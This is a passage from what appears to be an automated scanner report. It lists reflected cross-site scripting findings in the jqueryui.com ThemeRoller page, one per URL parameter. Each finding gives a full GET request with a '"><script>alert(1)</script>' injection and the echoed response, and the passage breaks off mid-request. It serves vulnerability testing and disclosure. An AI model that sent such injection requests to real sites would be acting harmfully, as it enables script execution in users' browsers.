Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d112"><script>alert(1)</script>4fec38c0b08 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.148. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f4e"><script>alert(1)</script>5a653707aec was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

2.149. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13a5"><script>alert(1)</script>d8cd7804d63 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

2.150. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e33"><script>alert(1)</script>92863e6f3a7 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.151. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ea6"><script>alert(1)</script>28e30971b21 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

2.152. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1273e"><script>alert(1)</script>cd77f13a13f was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

2.153. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e57"><script>alert(1)</script>1a584325653 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

2.154. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ed"><script>alert(1)</script>575a5646092 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.155. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa69"><script>alert(1)</script>b707c48f40 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40" type="text/css" media="all" />
...[SNIP]...

2.156. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902d3"><script>alert(1)</script>d640d8b9ce9 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offs